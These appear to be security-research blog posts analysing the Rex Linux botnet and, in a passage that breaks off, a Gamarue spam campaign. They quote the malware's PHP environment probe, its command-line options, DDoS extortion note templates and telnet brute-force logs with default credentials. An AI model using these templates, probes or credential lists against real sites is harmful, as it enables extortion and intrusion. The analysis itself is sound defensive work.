illustration by Craig Simmons

Octopus-Rex. Evolution of a multi task Botnet


During the last decade, different types of malware have been targeting Linux servers; Elknot, Encoder, Mirai, LuaBot, NyaDrop, Gayfgt etc. Most of them are used for DDoS purpose but there are some exceptions. Rex is one of them.
In this article we’ll try to present a detailed analysis of Rex.
Rex is a new malware developed in Go. Monitoring its activity over the last seven months brought out the efforts for developing various features.

Malware overview

Rex is a hybrid between a malware and a tool. The behavior depends on a list of arguments.
You can use it in two different ways:
– Scan mode: with the “scan” command line argument, the binary file uses embedded exploits to infect new Linux servers.
– Without scan mode: Rex contacts other bots through P2P protocol (DHT over HTTPS) and waits for commands.
Rex is always installed as a hidden file in the directory /tmp/, the malware does not have persistence mechanisms or any other hiding features. Quite the contrary, a help menu is available (-h).

benkow@stormshield:/home/rex/tmp$ ./.Z9g5aas0p0 -h
Usage of ./.Z9g5aas0p0:
        enable debugging
  -elevate.ignore string
        credentials to ignore during elevation (default "root")
        skip elevation (default true)
        enable stdio ipc
        log DHT requests
        log HTTP requests
  -socks string
        SOCKS5 proxy address
  -strategy string
        scan strategy [random, sequential] (default "random")
  -target string
        target(s) (default "")
  -wait int
        wait for PID to exit before starting (0: disable)
        enable WordPress Pingback

The help menu describes all the features available for both modes (scan or c&c).
Arguments details:
– Debug/log: launch the malware in debug mode, it is useful for analysis.
– Elevate: Rex can try to run itself as root by bruteforcing SSH service, you can ignore specific credentials with elevate.ignore pwd
– Ipc: we have not seen this feature used yet
– Socks: launch Rex through a socks proxy
– Strategy: configure how Rex scan IPs (random or sequential)
There are also some hidden arguments. You can use Rex as a DDoS tool with the argument “–stresser target”.
The main process is used for malware communication, when the bot master sends a command, the main process forks with the command in argument.
This is why, when you look at an infected host, Rex uses several processes:

Development cycle

Rex is a very active botnet. The binary file is updated on a daily basis. We’ll try to give an overview seven months of new features (click to enlarge).

Once upon a time… Rex – April 2016

The first version (a808a6e45d4f3837fcf30a28f6594ffff320f9b994eb35f7e915dd9d954c912c) was spotted at the end of April 2016.
Due to debug logs, we know that the malware is built on “/home/ubuntu/src/rex/”.


The first version was mainly used for infecting a first group of servers. It contained several exploits but no useful features.
Rex tries to infect other servers via Web based exploits (WordPress, Drupal…).
In order to exploit a remote file inclusion vulnerability, the remote file is hosted on infected machines on port 5099. I.E.: https://%s:5099/payload/php/%s/wp-gwollegb/ for gwollegb RFI exploit.


Rex infects Drupal websites via CVE-2014-3704, a SQLi that allows an attacker to change the admin password. It serves two purposes, first getting access to the server and second locking the website in order to ask for a ransom.
After exploitation, Rex wrote a blogpost on the homepage with the following message:
“Website is locked. Please transfer 1.4 BitCoin to address 3M6SQh8Q6d2j1B4JRCe2ESRLHT4vTDbSM9 to unlock content.”
In the first version, Drupal locker was the only “visible” feature.


Rex embeds the following WordPress plugins exploits
– Revslider
– Site-import
– Brandfolder
– Squirrel
– Robo-gallery
– Gwolle
– Woocommerce
– Issu panel

Hereafter is an example of infection:


In this example, Rex exploits a Revslider WordPress module in order to upload a zip file / which contains a PHP script used for PHP verification:

<?php print(ini_get('safe_mode').'|'.ini_get('safe_mode_exec_dir').'|'.ini_get('disable_functions').'|'.ini_get('open_basedir'));;die('ok - h5tmVOxiMH');?>

If everything is ok, Rex binary file is uploaded and the server is infected.


Rex embeds a module called “Kerner” in reference to blog “Kerner on security”. This module is a Remote Code Execution in CCTV-DVR


Rex embeds 2 Jetspeed vulnerabilities (CVE-2016-0709 CVE-2016-0710). These exploits are flagged as “TODO” and are not functional yet.

“We are armada collective” – May 2016

After one month, the bot master has uploaded the first big update with an interesting feature: a Ransom note sent to the Drupal admin. (21-05-2016) 92651d4a11a43a9043a8126f2ada1e5bf1e00cb506d46c939e20f3ece93cb81d

We are Armada Collective.
All your servers will be DDoS-ed starting {{ .Time.Weekday.String }} ({{ .Time.Format "Jan 2 2006" }}) if you don't pay {{ .Amount }} Bitcoins @ {{ .Address }}
When we say all, we mean all - users will not be able to access sites host with you at all.
If you don't pay by {{ .Time.Weekday.String }}, attack will start, price to stop will increase by {{ .Step }} BTC for every day of attack.
If you report this to media and try to get some free publicity by using our name, instead of paying, attack will start permanently and will last for a long time.
This is not a joke.
Our attacks are extremely powerful - sometimes over 1 Tbps per second. So, no cheap protection will help.
Prevent it all with just {{ .Amount }} BTC @ {{ .Address }}
Do not reply, we will probably not read. Pay and we will know its you. AND YOU WILL NEVER AGAIN HEAR FROM US!
Bitcoin is anonymous, nobody will ever know you cooperated.

Interesting fact with this ransom note, CloudFlare reported detection of this threat in March 2016. But we spot the first version of Rex with this ransom note at the end of May 2016.
A deeper look at the ransom note shows that it is not exactly the same; we have the same bullshit about 1Tb DDoS attacks but sender email is different (we’ve seen / and CloudFlare see ).
This coincidence lets us thinks that Rex developers have done some tests with this threat before creating Rex. At this time no real DDoS feature were present in the binary file.
Three days after (24-05-2016), another update came with one real DDoS implementation, DnsAmpl.

Optimizations time – June 2016.

During June 2016 we did not notice important updates, but we have seen that the bot master has refactored the source code until the end of June.
At the end of June, Rex has implemented a complete “stresser” module. Now the malware supports many different DDoS types (HTTP, SlowLoris, DNSAmp…) and the builder moved on another machine “/home/user/src/rex/”.

“We are anonymous” – July 2016

Some days after (09-07-2016) Rex added 3 new exploits:
– Drupal RESTWS REC exploit
– Magento RCE exploit (CVE-2015-1397)
– Airos Arbitrary File Upload Exploit
The ransom note has been rewritten. Now they did not mention Armada Collective anymore but call themself “anonymous”.

We are Anonymous.
All your servers will be DDoS-ed starting {{ .Time.Weekday.String }} ({{ .Time.Format "Jan 2 2006" }}) 
if you don't pay {{ .Amount }} Bitcoins @ {{ .Address }}
When we say all, we mean all - users will not be able to access sites host with you at all.
Right now we will start 15 minutes attack on your site's IP {{ .IP }}. It will not be hard, 
we will not crash it at the moment to try to minimize eventual damage, 
which we want to avoid at this moment. It's just to prove that this is not a hoax. Check your logs!
If you don't pay by {{ .Time.Weekday.String }}, 
attack will start, price to stop will increase by {{ .Step }} BTC for every day of attack.
If you report this to media and try to get some free publicity by using our name, 
instead of paying, attack will start permanently and will last for a long time.
This is not a joke.
Our attacks are extremely powerful - sometimes over 1 Tbps per second. So, no cheap protection will help.
Prevent it all with just {{ .Amount }} BTC @ {{ .Address }}
Do not reply, we will probably not read. Pay and we will know its you. AND YOU WILL NEVER AGAIN HEAR FROM US!
Bitcoin is anonymous, nobody will ever know you cooperated.

The ransom note tries to be more credible, It ask for log checking. Something it could not do before because of the lack of DDoS feature. But it is not enough to earn money. We checked some bitcoin addresses and all these wallets were empty.

BTCBrute and Clicky – August 2016.

Early in August, two new important updates came. The malware size has increased of 1.5mo and now embeds a bitcoin miner based on Btcsuite and a click fraud module called “clicky”.
The click fraud part is really interesting. Rex uses the botnet to display ads hosted on The game here is to use each bot for clicking on ads and earn money from advertiser. The good news is that it is easy to track ads campaign of a-ads and to retrieve nice statistics.
We have spotted three ad units: 218355 (code name “Unicorns!”), 261029 (code name “Porkupines!”) and 251270 (code name “Ferries!”). Two of them are associated to the bitcoin address 1HebiSQX2WfE2kXUuva79US4zNUxcYrHjZ and the last one used 1Q6mA6ERbwmaHX1nYwkrKuDiVjCYe2xma3.

unit 218355 - income details
unit 218355 – income details

unit 218355 - impressions details
unit 218355 – impressions details

The ads displayed looks like:

At the time we wrote this article, the clicky module has generated ~1€.

History of a fail – September 2016.

At the end of August, the first big fail of Rex starts (91164673cda591a9a4dec91ecda6dbb515d48df7b56108b5fa0053395c733188). Rex implements a feature for creating a lot of Instagram accounts, probably for social network fraud. But bypassing Instagram anti-spam is not so easy 🙂
First, Rex tries to use the botnet to create Instagram account via
Each bot used his own IP to create these fakes accounts. But Instagram has some anti-spam features and all nodes of the botnet have been blacklisted in a few minutes.

{ID: Name:oTmJzK6p Username:oTmJzK6p Password:DU9vD} 
(via &{Addr:XXX.XXX.XX.XXX:443 Type:2 Node:<nil> 
Created:0001-01-01 00:00:00 +0000 UTC Updated:0001-01-01 00:00:00 +0000 UTC}): token
{ID: Name:Sin4a Username:Sin4a Password:eVdU6} 
(via &{Addr:XXX.XXX.XX.XXX:443 Type:2 Node:<nil> 
Created:0001-01-01 00:00:00 +0000 UTC Updated:0001-01-01 00:00:00 +0000 UTC}): ip blacklisted

One week later, due to node blacklist, Bot master has implemented a proxy socks feature in order to bypass the Instagram blacklist.
This new feature results again in 2 fails:
– First implementation failed due to the length of the password.

{"status": "ok", "errors": {"password": ["Create a password at least 6 characters long."]}, 
"account_created": false}instagram.AccountCreate 
&{ID: Name:ZRSlnk3uH Username:ZRSlnk3uH Password:A1EtB} 
(via &{Addr:X.XXX.XXX.XX:80 Type:2 Node:<nil> 
Created:0001-01-01 00:00:00 +0000 UTC Updated:0001-01-01 00:00:00 +0000 UTC}): not created

– Second fails resides in the fact that Rex uses known proxy socks list that is already blocked by Instagram.

{"status": "ok", "errors": 
{"ip": ["The IP address you are using has been flagged as an open proxy. 
If you believe this to be incorrect, please visit"]}, 
"account_created": false}instagram.AccountCreate 
&{ID: Name:LOT8mWL Username:LOT8mWL Password:yF7QO3} 
(via &{Addr:XXX.XX.XX.XX:80 Type:2 Node:<nil> 
Created:0001-01-01 00:00:00 +0000 UTC Updated:0001-01-01 00:00:00 +0000 UTC}): ip blacklisted

After one month of fails, we have not seen this feature used anymore by the bot master.

When Rex meets Mirai – October 2016

After seven months of life, the main problem with Rex is the low number of bots. Without a large botnet, it is difficult to make a real return on investment.
In September 2016 (4b513dfc68fe825e5f83c51fc1a023c15bf1039e48e025a0a4f4b034dbf443b9), media put light on the Mirai botnet (IoT botnet used for DDoS).
After the leak of the source code of Mirai, Rex developer tried to implement the Mirai telnet scanner in Rex.

*scanner.telnet.mirai - trying ubnt:ubnt
*scanner.telnet.mirai - prompt at 36 in "ubnt\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai - prompt at 38 in "enable\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai - prompt at 38 in "system\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai - prompt at 37 in "shell\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai - prompt at 34 in "sh\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai - credentials incorrect "/bin/busybox MIRAI\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai - trying 888888:888888
*scanner.telnet.mirai - prompt at 38 in "888888\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai - prompt at 38 in "enable\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai - prompt at 38 in "system\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai - prompt at 37 in "shell\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai - prompt at 34 in "sh\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai - credentials incorrect "/bin/busybox MIRAI\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai - trying root:xc3511
*scanner.telnet.mirai - prompt at 35 in "\r\n\rPassword is incorrect\r\n\rPassword: "
*scanner.telnet.mirai - prompt at 35 in "\r\n\rPassword is incorrect\r\n\rPassword: "
*scanner.telnet.mirai - prompt at 35 in "\r\n\rPassword is incorrect\r\n\rPassword: "
*scanner.telnet.mirai - prompt at 35 in "\r\n\rPassword is incorrect\r\n\rPassword: "
*scanner.telnet.mirai - prompt at 35 in "\r\n\rPassword is incorrect\r\n\rPassword: "

As usual, this first buggy version of Rex Telnet scanner was tested directly in the wild. Unfortunately for the bot master, after one week of telnet scanning, only few new victims were infected (less than 10). But now, when you want to retrieve Mirai sample via Honeypots, you have to be sure that it is not Rex ;).
At the end of October (25-10-2016) (1058cce9f28c2a3522c31b67e913f00f229c2e00977c979dd68237e184c6df79) an update now include an SSH scanner. The malware scan Internet for SSH and try to brute force services with the same passwords list than Mirai.

*ssh.Scanner.Scan - ssh
*ssh.Scanner.Scan - ssh
*ssh.Scanner.Scan - ssh
*ssh.Scanner.Scan - ssh
*ssh.Scanner.Scan - ssh
*ssh.Scanner.Scan - ssh
*ssh.Scanner.Scan - ssh
*ssh.Scanner.Scan - ssh
*ssh.Scanner.Scan - ssh
*ssh.Scanner.login root anko - version "SSH-2.0-dropbear_0.52"
*ssh.Scanner.Scan - ssh
*ssh.Scanner.Scan - ssh
*ssh.Scanner.login [root anko]: wait: remote command exited without exit status or exit signal
*ssh.Scanner.Scan - ssh
*ssh.Scanner.Scan - ssh
*ssh.Scanner.Scan - ssh

Last funny fact, this version includes a set of commands used for QA and benchmarking purpose. Maybe they hired a Quality Engineer.

benkow_@stormshield:/home/rex# ./rex -h
Usage of ./rex:
        enable debugging
  -elevate.ignore string
        credentials to ignore during elevation (default "root")
        skip elevation (default true)
        enable stdio ipc
        log DHT requests
        log HTTP requests
  -socks string
        SOCKS5 proxy address
  -strategy string
        scan strategy [random, sequential] (default "random")
  -target string
        target(s) (default "")
  -test.bench string
        regular expression per path component to select benchmarks to run
        print memory allocations for benchmarks
  -test.benchtime duration
        approximate run time for each benchmark (default 1s)
  -test.blockprofile string
        write a goroutine blocking profile to the named file after execution
  -test.blockprofilerate int
        if >= 0, calls runtime.SetBlockProfileRate() (default 1)
  -test.count n
        run tests and benchmarks n times (default 1)
  -test.coverprofile string
        write a coverage profile to the named file after execution
  -test.cpu string
        comma-separated list of number of CPUs to use for each test
  -test.cpuprofile string
        write a cpu profile to the named file during execution
  -test.memprofile string
        write a memory profile to the named file after execution
  -test.memprofilerate int
        if >=0, sets runtime.MemProfileRate
  -test.outputdir string
        directory in which to write profiles
  -test.parallel int
        maximum test parallelism (default 8) string
        regular expression to select tests and examples to run
        run smaller test suite to save time
  -test.timeout duration
        if positive, sets an aggregate time limit for all tests
  -test.trace string
        write an execution trace to the named file after execution
        verbose: print additional output
  -wait int
        wait for PID to exit before starting (0: disable)
        enable WordPress Pingback

We’ll continue to monitor all these features, the developer seems to be creative.

Crawling the botnet

As reminding, Rex use DHT P2P over HTTPS for communication. Due to certificate pining failure it is easy for us to do some man-in-the-middle on the malware and then implement a crawler.
This is how looks like Rex DHT request

As you can see, Rex uses the default Go User-Agent “Go-http-client/1.1” and sends gzip encoded requests.
We know that DHT supports the following commands:
So, it is easy to implement a quick crawler.
At the time of writing, despite the efforts of the bot master, the botnet is still harmless (~150 bots). Not enough for doing any significant DDoS.

We try to identify the most affected country but due to the random scan strategy this do not allow us to conclude something useful.


Linux malware is a trendy topics, we can find new families every week. The huge amount of vulnerable servers available and the absence of anti-virus attracts crooks on the Linux side. They can stay on a compromised server for several months without being detected. In the case of Rex, if they did not implement “visible” features like Drupal locker, the malware would still be hidden.
Regarding how the bot master uses this botnet, we can easily conclude that it may not be part of a big cyber gang, Rex Botnet looks more like an experimental botnet.
2017 promises us some funny crapware on Linux.


Quick and dirty yara rules for VTi

rule Rex {
    description = "Quick and dirty rule for Rex malware"
    author = "Benkow_@Stormshield"
    $string1= {6d 61 69 6e 2e 67 6f}
    $string2 = {72 65 78}
    $string3= {64 72 75 70 61 6c}
    all of them

List of hashes (unpacked version only)


illustration by Craig Simmons

From website-locker to DDoS: Rex !

In May 2016, Softpedia wrote an article about a Drupal web ransomware. This malware exploits an SQL Injection on CMS Drupal, changes admin credentials and asks for bitcoins to unlock content.
After locking the website, a malware is executed on the server:

After this ends, the last uploaded file is a binary file written in the Go programming language, which is the actual ransomware. This Go binary deletes the file upload form and replaces it with the ransom note seen above.

3 months after this article, there was no available sample of this malware on public repositories. So, it’s time to try to find one. We only know that the malware is developed in Go and exploits Drupal vulnerabilities. Thanks to @DlBlind, we also know that it uses P2P to communicate.
Please note that this article is not a reverse of the malware but tries to explain the attack vector and some interesting key features.

Sample Hunting

Googling « Website is locked. Please transfer 1.4 BitCoin to address », we can found a lot of hacked Drupal. After a quick look, we retrieved an unknown sample executed as:

./G2eCM9jUiz -elevate.skip -wait 20619 2>/tmp/l

where the file “l” is actually a log file looking like:

*node.Node.Run "random" 8184
*node.Node.runScanner *node.BlacklistFilter 0x18d7e4c0 7366
*rpc.Client.SetBinary "linux-386" 0x18c0b560

*rpc.Service.SetBinary &{Platform:linux-386 Binary:0x1901ae40}
new neighbor
new neighbor
new neighbor
new neighbor
new neighbor
new neighbor

The above snippet shows that the sample uses P2P communication.

A quick analysis of the sample shows that it is developed in GO and compressed with UPX. As shown below, it is not known by any anti-virus on VT:
We found our sample and it’s an interesting one. Actually, Drupal-locking is a very small part of the available feature of the self-called “Rex” malware which is still in evolution. We found many different variants from April to August 2016.

Rex malware weapons

Rex is made of 5 different parts. Some of them seem to be still in development:

  • Attack vector
  • Bitcoin mining
  • C&C Communication
  • Ransom – Armada Collective
  • DDoS

Hereafter, we will look into details for each of this part.

Attack vector

Depending of the variant, Rex malware scan Internet for different vulnerable services. The kill chain is simple:

  • Bots are scanning Internet for vulnerable websites
  • Websites are infected and defaced (Drupal-locker)
  • “Rex” malware is dropped on the server
  • The server communicates with other bots via P2P.

Hereafter, a non exhaustive list of exploits used by different variants of Rex malware.


It’s not something new, Rex can exploit an SQL injection on Drupal 7 via CVE-2014-3704. The malware adds a new admin account, locks all blogposts with website-locker notes, uploads and executes Rex.


Rex is able to infect other CMS. WordPress plugins are mainly targeted. At least 8 exploits are available:

We have found some infected WordPress websites but we didn’t see any of them locked.


The botnet scans for Magento eCommerce too. It looks for ShopLift RCE – The attack is similar to the Drupal attack. A new admin account is created and a Webshell is used for executing Rex.


A few other exploits are shipped with Rex:

The above list confirms that Rex does not focus on website locking but tries to build a P2P botnet.

Bitcoin mining

As lots of malware, Rex has bitcoin mining capabilities. We won’t dig into details for this.

C&C communication

We haven’t looked deeper in the network part but thanks to @silascutler @DlBlind, we know that this botnet use Kademlia P2P network (“/home/user/src/rex/dht/” ) on port 5099 with TLS enabled.

It seems that all aforementioned weapons are available through the P2P network.

Ransom – Armada Collective

The most curious feature of the malware is called RansomScanner. It is used to retrieve admin contacts of the infected website, and send a DDoS threat email. Below, the email template:

Armada Collective <>
We are Armada Collective.
All your servers will be DDoS-ed starting {{ .Time.Weekday.String }} ({{ .Time.Format "Jan 2 2006" }}) if you don't pay {{ .Amount }} Bitcoins @ {{ .Address }}
When we say all, we mean all - users will not be able to access sites host with you at all.
If you don't pay by {{ .Time.Weekday.String }}, attack will start, price to stop will increase by {{ .Step }} BTC for every day of attack.
If you report this to media and try to get some free publicity by using our name, instead of paying, attack will start permanently and will last for a long time.
This is not a joke.
Our attacks are extremely powerful - sometimes over 1 Tbps per second. So, no cheap protection will help.
Prevent it all with just {{ .Amount }} BTC @ {{ .Address }}
Do not reply, we will probably not read. Pay and we will know its you. AND YOU WILL NEVER AGAIN HEAR FROM US!
Bitcoin is anonymous, nobody will ever know you cooperated.

It’s a well-known template used by the crooks of Armada Collective. Lot of people have received this kind of email. Cloudflare wrote a blogpost about this ransom note.
There is a supposed gang that sends extortion email to online businesses but nobody has seen any real DDoS. Unfortunately, this kind of scam seems works.

In spite of the lack of actual DDoS follow through, it appears that many victims are paying the extortion fee. A security analyst from the Bitcoin analysis firm Chainalysis studied payments sent to the Armada Collective’s Bitcoin addresses and concluded that more than USD$100,000 has been sent to the attackers by victims.

An example of StackExchange post:
But things starts to be different…


Armada Collective emails look like hoax, BUT, we have seen infected servers that actually run real DDoS attacks!

Armada collective seems to start a new strategy and try to launch real attacks. The “1Tbps” threat seems ridiculous but If the botnet grows leveraging on fresh vulnerabilities, it may become more harmful.

In the recent versions of Rex, the ransom note has been updated:

We are Anonymous.
All your servers will be DDoS-ed starting {{ .Time.Weekday.String }} ({{ .Time.Format "Jan 2 2006" }}) if you don't pay {{ .Amount }} Bitcoins @ {{ .Address }}
When we say all, we mean all - users will not be able to access sites host with you at all.
Right now we will start 15 minutes attack on your site's IP {{ .IP }}. It will not be hard, we will not crash it at the moment to try to minimize eventual damage, which we want to avoid at this moment. It's just to prove that this is not a hoax. Check your logs!
If you don't pay by {{ .Time.Weekday.String }}, attack will start, price to stop will increase by {{ .Step }} BTC for every day of attack.
If you report this to media and try to get some free publicity by using our name, instead of paying, attack will start permanently and will last for a long time.
This is not a joke.
Our attacks are extremely powerful - sometimes over 1 Tbps per second. So, no cheap protection will help.
Prevent it all with just {{ .Amount }} BTC @ {{ .Address }}
Do not reply, we will probably not read. Pay and we will know its you. AND YOU WILL NEVER AGAIN HEAR FROM US!
Bitcoin is anonymous, nobody will ever know you cooperated.

Now, crooks talk about a 15 minutes testing DDoS. They ask checking logs as a proof. They want to be taken seriously.
Rex looks like a kind of strange webserver-ransomware that didn’t encrypt files but lock access to administration page and threat to DDoS.


Linux botnets continue to evolve and become very interesting. In this case, what looks like at first sight a Drupal locker is in fact a complete botnet, still in development, with many features.
In the nexts write-ups we will try to explain each module of this botnet.
As usual the attack vector is not 0day but well known vulnerabilities, so I’ll conclude this article like other:
If you are a website administrator, DO NOT LEAVE OUT OF DATE SERVICE ON THE INTERNET.


9070f56651f44ec722e17df67b8a954888e387a8f2574594c80937d0f39c471a  .0LD5dVbuo9
bf211d46551079e7f7646ffd6bfda065f1307ea81508d1625b5c65005d929cb3  .0OHjeERDbv
550b9b4c5b2dbe83fa3e227cca65b9b9768e2ea597c2e109205dba51faee5869  .0OhoU6US1m
677464da2fcf73b9793daca3191501da02957af08a6471a047410ce99ea49405  .0r4mKMUlJ6
69402f4bd7718a3403f1caaaa387edc70b299f6aecc06de39e3a9ac28873a184  .0rqNlrPujv
32c921dd4b755af519f648102098735a569a0326a79a911eb47174bd058e5c43  .0YOtp0GQMk
52bf6ae8fe7a0a59ca8d089444207c173e20a7a11c8b5e815b937e2f4224da4f  .1ZRhWKqTlY
950cd068d9c51b941bdfe4721a3156af15dc408d2df23c1f2bc41b87159b109e  .3v0UwARWmv
1f4d876b17a6d786aa793b9c529235f9f9e164d70a74d8d26ca850d18f1329a7  .3weUyhjJZe
09f1967e97a97a1d0963a84823fa2611b9555866f09d7a04bb69bc4d877f9631  .42wVPcdaFD
3e4cebd60a1d6a6b29bac68ace2547c2e3894a0e5865dd90aff5764f8e7dc16d  .4JkeqTzZSX
dcd0e1586630bc8c50fe600899bee76b853057fd9158ed541d7ddec53c8f2186  .5Ygi9nGrHn
cb42573e36fb148bc1109229a1025cdcb375c166361605f0681da9e54e3ef81d  .5ZFxAbOeBY
08ab4abd017568142d061ffd5a2592a491730dddb4485211fda53f39d43e3efb  .7RCBTpSOUh
ac36c87cacbe1b8327fae3084ebd1740a3a5c6c6f208c1c77da56932a9ca3be6  .7tsPagH3FM
d67ae5639618a3409711377e124ef2c6293200aa3026b8b2996654db63645481  .9bKas738kc
a1610e735042ce0197859e6fd7772039e63efce78d6c9cf642492d1c8f1d7540  .9G97ZhwNer
07dd2c7be7a0becb178967c43684c1a687deb217e87575d18fd6b73dc988bd78  .9MgvdLBtL0
dbc3f96fcbbfd90f877dc11fcdedca1c1e574b951ac70edc3160ed9f389c3fd3  .aH7HRrz554
8e7eaed42f50c865f72f7351b87a988de5aa94781b4dab4ddbe993872435f293  .bM04ITZnuq
97c1ed3d52d663f9bad2eef716169f06053dc2bcf8e3d857b0a702e8fae546c9  .C91EZKVz6Q
a1000d4cb81cfb7dfac660722938f3d9c7cb6e36c33e129097ddd29f3dfd1890  .cOVyPvf01L
9f568df46838872b389628b665940415d897823b2e1804e2625c3dfb0b6850b4  .D90yb8KdDV
cc01ba0825208402b0fc2eb62146e856f69d1e9f53b745d8f068f0d09e6170c0  .E61NBnYjak
40c882738ea1e01cc4e8027dd6ce5d55552e5630c8f65e86db630fca09d85fa9  .EETl2pJOf9
0e6c53797964b611c867cb5e5b492d45edf5472924c9a60a99433240f1712f15  .eLBaxwiu2d
c79d7b2a8caf5cc19a019772053c54d1ec02f8ae15b577bbbbd9bf82f19caedb  .fkmJQOIqYB
d097f55f82e88a32b057010c96f553aa7c8ccef12c2a8484aab0fb3dab9d4a0f  .H4g8bASf8Y
c058d576a108bdcf637a6ed399b4d9a1e3bbb6f194882ffada01b85e79109f65  .HdUykUNGy8
339eaabda43fbf0ee0caa6021a999d383713498911523d2b21e2ee2f1541f78f  .Ju7XqX36yy
3dee377037f7fcfd6539c23bb1cdc6eda46680c8773525b784150c1237788965  .KDnA4yWrGc
9d41dc182dee0690e5c5f08f9276548a85f4b986478fd30ec4208d95d54cffeb  .KzmJO5vHRQ
b30dfa13f8dc7162f3edb43dff8507f82c01bd5bd6e5a1ae2e3b2e55dd6b10c0  .LqZzmAJcjo
f7bc5d56312ae6205b21aa4c72708383716907754b037013f47bc88203fbb450  .Oer60jCsoB
9909910d6e008e15c98d26e214f619a7a82787137158784998d99b5c03cbe8f2  .OiZhEG9cEu
2549560970bb8ebca0136f7d6c8111196295d083c6fd6101a7f9178089502cc0  .q7hsioOPWv
fe2c837d1662ca47ebd86c0cf0a3a382ee589bce6b77dabae30801d71a7d280f  .rG47yPBz5p
67a3b5d1fb946daccd7f3562e35b90537f9032184a0605cc9b8613c91a4ea1be  .RnKtruJM9f
22a578f2d30f316d441b73efbeaa0b53641686d2fa75ad44d4d3992da9ceaf5f  .SzIYofKRTz
0723de24bc86eedde149c53e0f93a18596bed424e823f1b46c2f97e358931b83  .YPuels1RDm
6b46b6eff4be06d47284492fed7f71c53103bfaa610952151bddebb8046a34f1  .yYRSdRs6kH
9bd1d3a567e2036f8e57745dd81333911b06a34f4ed6d7d68daa674aac0d7b96  .Zw64nQ52IX


Gamarue loves malicious JavaScript too

A deep look inside a recent campaign

In malware ecosystem, there is some old malware families are able to adapt their propagation methods and successfully continue to infect many users. It is the case of Gamarue (Aka Andromeda). I will explain here how this new Gamarue campaign spreads via malicious JavaScript in emails spam.
Early in April, I have been poked via Twitter regarding a spamming campaign in progress:
Yet another malware dropped via emails and malicious JavaScript. The binary dropped is:
Emails containing zip archive in attachment constitute the attack vector. This archive contains a JavaScript file which downloads and executes a payload hosted on the Internet: this payload is a good old Gamarue.

Gamarue / Andromeda

Gamarue (or Andromeda) is a well-known modular malware. Basically, Gamarue is a dropper which drops different modules. Since it is possible to easily develop a new module, Gamarue is loved by crooks.
Don’t worry, this article is not another Gamarue analysis. A lot of great articles are already available
I’m not a big expert of Gamarue, so I have some difficulties to identify the version of the malware. For those who can help, the C&C communication requests looks like:
This template doesn’t match the usual version (
Here are some of the features of the packer found in this version of Gamarue.

AV detection

The packer tries to detect if an Anti-Virus is installed on the victim’s computer. To do this, the malware uses the function ZwQuerySystemInformation with the parameter SystemProcessInformation (0x5) to retrieve the process list and checks for the presence of one of the following processes:

  • dwservice.exe (DrWeb)
  • defenderdaemon.exe (Shadow Defender)
  • spiderui.exe (DrWeb)
  • spidernt.exe (DrWeb)


VM detection

Gamarue packer tries to know if it is being run in a virtual environment by checking (as this is done for AV detection) if some processes are running:

  • vmacthlp.exe (VMWare)
  • vboxservice.exe (Virtual Box)
  • vboxtray.exe (Virtual Box)

It also attempts to load some DLL to detect if running in a virtualized environment:

  • VBoxHook.dll (Virtual Box)
  • VBoxMRXNP.dll (Virtual Box)

And finally, it checks if the VMWare tools directory exists:

  • C:\program files\VMware\VMware Tools



To complicate the dynamic analysis, the packer is looking for some tool process:
– taskmgr.exe (the built-in Windows task manager)
– procmon.exe (Process Monitor)
It also enumerates all Window title too and looking for the strings:
– HTTP Analyzer
– Sysinternals
– capturing from Wireshark
– TCPViewClass TCPView
– task manager

After the unpacking process, Gamarue launches C:\windows\system32\lsass.exe (either with CreateProcess or WMI) and injects a rogue DLL inside the process.
This DLL is used to communicate with C&C and drops all 3 modules:

  • Pony, a well-known stealer. This module steals sensitive data like FTP credentials, bitcoin wallet, browser credentials…
  • Hioles, a malware that acts as a proxy on the victim’s computer in order to stealing webmail information (steal Hotmail credentials for example).
  • A mail spammer.

To better understand this campaign, we need to grab some information around this sample. To do that, we need to take a look inside the C&C server to find something useful.

Data exploration

I try to grab useful data by “guessing” the web server of the C&C found inside the original binary: I try to find sub directories which are available and maybe find directory with the option “directory listing” enabled. After some guessing I’m able to identify some interesting contents inside the C&C web server:

Stolen Data


In two different directories, I’ve found a lot of text files which contain stolen data. These data are related to email accounts and look like Hioles exfiltrated datas.

Pony panel

As seen in the original sample, a Pony module is used. I’ve found the control panel of the module in a subdirectory of the web server
You can find a lot of information on the Internet about pony
As we can see here, the attacker is running a malware campaign to grab stolen credentials.

ProxyCB Control panel

In another directory of the web server, I can find a PCB control panel. PCB is used to manage a botnet of proxies. You can find more information at
Some screenshots inside the control panel:



JavaScript obfuscation script

In the root directory of the C&C, I’m able to find a PHP page which displays obfuscated JavaScript in a text area:
This page may have ‘debugging’ purposes and a different script is generated each time the web page is refreshed.
Since this JavaScript is the same as the malicious attachment originally received by email, it should be related to the JavaScript payload obfuscation; we are on the right track…

The spam kit source code

Finally, I’ve found a browseable directory that contains all I need to understand how this Gamarue campaign works.
The archive 1/5.rar and nnn.rar contain a huge database of email addresses to spam.
Sendmail.rar is the source code of the spamming kit.
The other text (.txt extension) files are part of the spamming kit.
Let’s analyze the spamming kit inside sendmail.rar.
Let’s have a look at the binaries:

  • KWK.exe

It is a software used to generate keywords We can imagine that this software generates keywords used to craft random emails for the spamming campaign.

  • VPSProxy.exe

VPSProxy is a software created to manage a list of proxies. These proxies are infected website (CMS). The attackers upload a malicious PHP script on the compromised CMS servers and use them as proxies. It is really useful to be hidden when you are a crook :).
The PHP source code of the script uploaded on compromised host can be found at:
In the archive sendmail.rar, VPSProxy is configured with a list of 179 compromised hosts.
I’m not able to find the binary in charge of sending spam like in the TeslaCrypt case ( It seems that this spamming process is different.
I’ve looked inside the other file of sendmail.rar and found the code source of the spamming kit, from JavaScript obfuscation to mail sender.
For those who are interested, I put the readme on pastebin (
The whole kit works around the file send.php.
As first, the script checks if the option « jscode » is enabled. If yes, the script loads another script: jscode.php.
